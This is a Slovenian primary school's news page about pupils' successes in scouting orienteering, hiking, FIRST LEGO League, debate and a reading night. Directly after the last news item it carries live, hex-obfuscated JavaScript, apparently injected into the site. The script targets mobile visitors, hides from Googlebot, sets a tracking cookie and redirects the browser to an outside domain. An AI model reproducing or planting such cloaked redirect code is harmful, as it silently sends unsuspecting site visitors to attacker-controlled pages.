Skoči na glavno vsebino

logo-EkosolaA� A�zdravasA� A�etwinA� A�EU_flag_23LA� A�spitalic1A� A�park1A� A�eplus

OA� Pod goro

A�olska ulica 3
3210 Slovenske Konjice
03 757 29 50

PodruA?nica V parku
03 757 29 75

PodruA?nicaA�OA� A�pitaliA?
03 5763 133

Bravo, konjiški taborniki!

Konec januarja je v Zgornji Koreni pri Mariboru potekalo že 22. taborniško zimsko orientacijsko tekmovanje. Med okoli 250. taborniki iz cele Slovenije se je tekmovanja udeležilo tudi 25 tabornikov iz Rodu Belega konja iz Slovenskih Konjic.
S pet člansko ekipo, v kateri sta sodelovali tudi Vita Kampuš in Neja Vrhovnik, učenki 7. b razreda naše šole, so v kategoriji gozdovnic in gozdovnikov med 23. ekipami zasedli odlično 3. mesto, skupaj pa je rod med 18. sodelujočimi rodovi dosegel 2. mesto.

Zimski pohod na Brinjevo goro

V sončnem, a vetrovnem popoldnevu zadnjega januarskega dne smo se člani planinskega krožka odpravili na zimski pohod na Brinjevo goro.
Pred šolo se je zbralo 43 mladih planincev, ki so se v spremstvu štirih učiteljic ter izurjenih planincev, gospe Nade, gospoda Marjana in gospoda Slavka, podali na prijetno planinsko pot. Ta nas je vodila po Škalcah, mimo vasi Gračič pa vse do cerkve Matere Božje na Brinjevi gori. Seveda smo med potjo imeli tudi čas za postanke, prijeten klepet in slastno malico.
Z Brinjeve gore smo se nato odpravili proti Zrečam, kjer nas je že čakal avtobus ter nas malo utrujene, a polne lepih vtisov, odpeljal nazaj v Slovenske Konjice.

MountStorms v finalu FIRST LEGO League!

Ekipa MountStorms, ki zastopa našo šolo v programu FIRST LEGO League, se je v soboto, 11. 1. 2020, udeležila regijskega turnirja.

Turnir je potekal na naši šoli. Robotska tekma in predstavitvene mize so bile na ogled v športni dvorani, tehnični intervju, projektni intervju in intervju za vrednote pa so potekali v prostorih šole.

Naša ekipa se je odlično odrezala na vseh štirih področjih tekmovanja in dosegla skupno drugo  mesto med dvajsetimi udeleženimi.

Najboljših sedem ekip je prejelo vstopnico za finale odprtega državnega prvenstva. Štiri ekipa pa so šle v čakalnico in čakajo na povabilo organizatorja. Finale bo potekalo 14. 3. 2020 v Kopru.

Člani ekipe MOUNTSTORMS so: Perina Klampfer, Tevž Neuvirt, Aljaž Čepin, Ažbe Kotnik, Alja Kukovič, Enja Ravničan, Anže Kovač in Lan Druškovič.

Neposredno v finale so se uvrstili:

  • Black & White, I. OŠ Celje, mentorja Ingrid Zupanc Brečko in Žan Močivnik
  • MountStorms, OŠ Pod goro Slovenske Konjice, mentor Dominik Trstenjak
  • RoboVrani, OŠ Vransko – Tabor, mentorja Tina Žličar in Matic Žličar
  • A.Š.I .N.E., OŠ Slave Klavore Maribor, mentor Aljaž Šabeder
  • RoboKlik, OŠ Radlje ob Dravi, mentorji Boštjan Ledinek, Simona Ternik, Urška Krajnc in Barbara Planinšič
  • Passengers, Prva kragujevačka gimnazija, Srbija, mentorice Katarina Veljković Ana Stanković, Ljubica Mudrić – Staniškovski in Marina Jelenić
  • Pizza Crew, OŠ Franja Malgaja Šentjur, mentor Branko Vizjak

 

Ekipe v čakalnici:

  • Udruženje Elektrobot Beograd, Srbija, mentorji Anica Pavlović, Miroljub Belić in Marija Reković
  • Robozlatki, OŠ Breg Ptuj, mentorja Mojca Vodušek in Vasja Robin
  • ShapeShifters, Inštitut 4.0 Celje, mentorja Matic Žličar in Tina Žličar
  • The Stormers, OŠ Sladki Vrh, mentorica Lidija Grubelnik

 

Prejeli smo veliko pohval tudi na račun organizacije. Veseli nas, da so se ekipe dobro počutile na naši šoli in jim bo ta turnir ostal v lepem spominu.

Nov uspeh naših mladih debaterjev

16. novembra je na OŠ Komen potekal 2. državni turnir v debati za osnovne šole. Našo šolo so pod mentorskim vodstvom učiteljice Nele Bejat Krajnc zastopale osmošolke Ema Marguč, Anja Košič, Tamaja Buh in sedmošolci Danaja Bajda, Ula Brumec in Leon Bobik.
Ekipa osmošolk je dosegla odlično 2. mesto v svoji kategoriji, ekipa sedmošolcev pa 3. mesto.
Vsem tekmovalcem iskreno čestitamo za dosežene rezultate!


Osmošolke, dve od njih sta komaj začeli z debato, so bile 2. v skupini tistih, ki debatirajo prvo leto in kar 8. od 25 ekip. Sedmošolci so bili 3. od 11 začetniških ekip in 10. od petindvajsetih.
Ema Marguč je bila 3. govorka od začetnikov ter 14. od vseh 75 tekmovalcev. Sedmošolka Danaja Bajda je dosegla 7. mesto med začetniki in 21. od 75 tekmovalcev.


Nela Bejat Krajnc je ob tem povedala, da je debata eden najboljših načinov razvijanja kritičnega mišljenja. »Med pripravo na debato se učenci seznanjajo z aktualnimi temami, za katere pogosto ni prostora v učnih načrtih. Ko raziskujejo določeno tematiko, se morajo o njej celostno pozanimati, poiskati razloge za in proti. Tako se naučijo oblikovati in ovrednotiti argumente ter zavzeti stališče. Debata spodbuja timsko delo, saj je za uspešno debato sodelovanje nujno.«
Mentorica je razložila tudi, da pri omembi besede debata večina pomisli na prepiranje in prepričevanje, vendar pa ima »debata predvsem izobraževalni namen, saj med pripravo na debatna soočanja učenci poglobljeno raziskujejo različne družbene probleme in iščejo rešitve za njih. Ob vseh aktivnostih učenci razvijajo veščine javnega nastopanja, aktivnega poslušanja, timskega dela in sprejemanja različnih mnenj.«

Medgeneracijsko in medkulturno obarvana Noč branja

Za nami je prva od treh Noči branja, ki jih bomo pripravili v tem šolskem letu. 15. novembra smo začeli z učenci 3. triletja. Prosta mesta so v trenutku zasedli sedmošolci, nato se jim je pridružilo še 5 devetošolcev.
Večer smo začeli z medgeneracijskim bralnim srečanjem učencev in učiteljev, ki so vsi prebirali isto mladinsko delo Sanje o belem štrpedu slovenske avtorice Marjane Moškrič, nadaljevali z iskanjem skritega zaklada, nato pa praznovali kar tri rojstne dneve.
Za jutranjo telovadbo, ki je bila plesno obarvana, je poskrbela učiteljica Katja Čuk. Nato pa smo pogledali izven naših meja, Kosovo in Albanijo sta nam predstavili sestri albanskih korenin, sicer rojeni v Sloveniji, Blerta in Egzona Bajrami.
Ponovno smo se imeli odlično.

Nekaj vtisov:

Zoja Z.: »Letošnja Noč branja mi je bila zelo všeč, še posebej iskanje zaklada in torta. Imeli smo tudi dve zelo posebni gostji, ki sta predstavljali tuji državi in spregovorili o svoji izkušnji šolanja v slovenski šoli.«

Zoja K.: »Letos je bilo čisto drugače, saj so tri prijateljice praznovale rojstni dan. Bilo je zelo ‘fajn’. Zelo všeč mi je bil tudi lov na zaklad in to, da smo zmagali vsi. Pa tudi učiteljici nas niso prehitro ‘poslale’ spat …«

Nastja: »Bila sem vesela, da sem lahko rojstni dan praznovala na Noči branja. Mogoče se drugo leto igramo skrivalnice – po šoli, v temi …«

Ilena: »Noč branja mi je bila všeč, ker smo imeli lov na zaklad, medgeneracijsko branje, žurko, igre, jutranjo telovadbo, posebni gostji …«

Nikita: »Bilo je super, saj sem imela rojstni dan. Zabava je odlično uspela, tudi torta je bila odlična in sveže iztisnjen pomarančni sok … Pa še glasbene želje smo vrteli..«

Klarisa: »Še nikoli nisem bila na Noči branja, zato sem bedela skoraj do jutra. Drugo leto zopet pridem.«

Maja: »Noč branja je bila zelo zabavna, zanimiva in polna smeha. V skritem zakladu so se skrivale knjige.«

Maša: »Na Noči branja smo ‘spoznali belega štrpeda’ in se pogovarjali o knjigi Sanje o belem štrpedu. Pri iskanju zaklada je bilo zabavno, saj smo sodelovali in reševali uganke. Zmagali smo vsi. Jazu sem v dar dobila Ustavo v stripu.«

Anika: »Bilo je zelo zabavno.«

Anže: »Škoda, da ni bilo več fantov in več devetošolcev.«

Marisa: »Bilo je zelo zanimivo, kljub temu, da so bili sedmošolci precej glasni.«

 

 

 

 

Beli štrped povezal učence in učitelje

V letošnjem šolskem letu smo se ponovno vključili v projekt Medgeneracijskega branja, ki poteka pod okriljem Društva Bralna značka Slovenije. Tokrat je knjižničarka za branje izbrala odlično delo Marjane Moškrič Sanje o belem štrpedu.
22 učencev zadnjega triletja in 12 učiteljev naše šole so se na prvem bralnem srečanju družili v petek, 15. novembra. Z Bralne značke sta se jim pridružili tudi Tilka Jamnik in Manca Perko. Lep večer sta glasbeno obarvali četrtošolka Eva Brumec in osmošolka Neli Petek.
Medgeneracijsko povezovanje ob literarnih delih, ki so namenjena najstnikom in odraslim, je bilo zelo prijetno, druženje pa so učenci nato nadaljevali še na Noči branja.

Mnenja udeležencev:

Sedmošolci o knjigi: Knjiga jim je bila všeč, saj je v njej izpostavljeno tesno prijateljstvo med mladimi. Knjiga jim je bila všeč tudi zato, ker je skrivnostna. Grozno so se počutili, ko so brali spis Maje Sade  o sprejemanju drugačnosti in njeni izkušnji – ena sedmošolka je ob tem zapisala, da ji je šlo kar na jok, da se je tudi sama počutila osamljeno in da nima nikogar ob sebi … Tudi določene stvari so jim bile grozne – na primer napisi »Kdo se boji črnega moža?!« Prav tako jim je bilo grozno, da denar omogoča takšne razlike in kako grozno se obnašajo bogati mladi do revnih. Čeprav jim je bilo prav zaradi izpostavljenih razlik, knjiga za to všeč.
Zanimivo in poučno branje. Povedali pa so, da jim je knjiga v začetku bila precej nerazumljiva, »težko« jim je teklo branje (so le sedmošolci), vendar pa so na koncu zgodbo razumeli.
Mladi o medgeneracijskem branju: medgeneracijsko branje se jim zdi super, zanimivo, ker tako izvejo mnenje odraslih o knjigi, ker slišijo različna mnenja, ker se generacije med sabo povezujejo in »ustvarjajo« trenutke. In tudi več berejo. Zdi se jim odlična ideja in bi radi še sodelovali. Mogoče je medgeneracijsko branje tudi priložnost, da izničijo kakšne predsodke.

Učitelji o knjigi: Učitelje je knjiga prevzela: »Knjiga je fantastična. Velik poklon pisateljici, res je carica.«
Povedali so, da je  knjiga zanimiva tako za mlade kot za starejše bralce. Želeli bi, da bi bila razlikovanja med tistimi, ki imajo in tistimi, ki nimajo,   le plod avtoričine domišljije. Verjetno tudi naši otroci pomanjkanje čutijo tako, kot je v knjigi zapisano. Iz dnevnih novic lahko izvemo, kako se tisti, ki imajo denar lahko izognejo odgovornostim, torej knjiga le ne more biti čista domišljija. Žal. 
Knjiga je zelo realna, s precej žalostno vsebino, s temo, o kateri se da res precej razmišljati. Med drugim tudi o tem, kakšne pogoje imajo mladi za odraščanje, o socialnih razmerah – blišč in beda sodobnega časa. Knjiga te ves čas spominja, da ne smemo takoj obsojati drugih, saj ne poznamo njihove plati zgodbe.

»Svet, ki si zapira oči, in s prstom kaže na razlike med ljudmi, to je svet, v katerem živimo.«

Učitelji o medgeneracijskem srečanju: Prijetna in zanimiva izkušnja. Prijetno je razmišljanja deliti z mladimi bralci in ugotoviti, da je svet skozi oči mladih prav tako kritičen in da ugotavljajo, da vsi potrebujemo spremembe v svetu.
Zelo so jih zanimala mnenja mlajših bralcev in kako so knjigo doživeli. Knjiga v tem primeru spet povezuje, tokrat različne generacije.

»Preživeli smo prijeten in sproščen popoldan v družbi učencev, sodelavcev in gostij. Zanimivo je bilo deliti mnenje o knjigi ter slišati učence, kako so oni videli in razumeli zgodbo.«

 »Posebna bralna izkušnja, ki je združila mlade nadobudneže in starejše razmišljujoče bralce, je pokazala, da je sodelovanje, izmenjavanje mnenj, misli, osebnih izkušenj neprecenljivo bogastvo, ki v vsakem bralcu pusti svoj pečat, ga obogati s posebno energijo, navduši za nadaljnje branje in pripomore h globljemu razumevanju prebranega.«

ŽUR POD GORO 2019

FLL-jevce obiskala župan in ravnateljica

Šolska FLL ekipa, ki tekmuje pod imenom MOUNTSTORMS, se pospešeno pripravlja na regijski turnir, ki bo potekal v soboto, 11. 1. 2020. Letošnji turnir je za nas poseben, saj ga gosti naša šola. Potekal bo v športni dvorani Slovenske Konjice. Projektna skupina je s pomočjo različnih virov podrobno raziskala probleme v mestih in se posebej osredotočila na lokalno območje. Probleme so predstavili in naredili ožji izbor štirih najpomembnejših. Vse štiri so posebej analizirali in soglasno izbrali problem: v Slovenskih Konjicah ni igral za gibalno ovirane. Trenutno raziskujejo vse kar je povezano z igrali za gibalno ovirane osebe. Da bi projekt uspešno realizirali, so v goste povabili župana občine Slovenske Konjice, gospoda Darka Ratajca in gospo ravnateljico Darjo Ravnik. Člani ekipe so predstavili program FIRST LEGO League in dosedanje delo na posameznih področjih. Župan je ponudil ogromno koristnih informacij, predvsem na področju projekta. Izrazil je zadovoljstvo, da se učenci vključujejo v takšne programe, saj lahko ob tem ogromno pridobijo. Dogovorili smo se za nadaljnje sodelovanje in ga povabili na regijski turnir. Svoje delo je predstavili tudi robotska skupina. Člani skupine določila poti reševanja misij. Zaključujejo konstrukcijski del sestavljanja ročk in počasi prehajajo na programiranje. Gospod župan in gospa ravnateljica, hvala za vaš obisk!
var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Dostopnost
//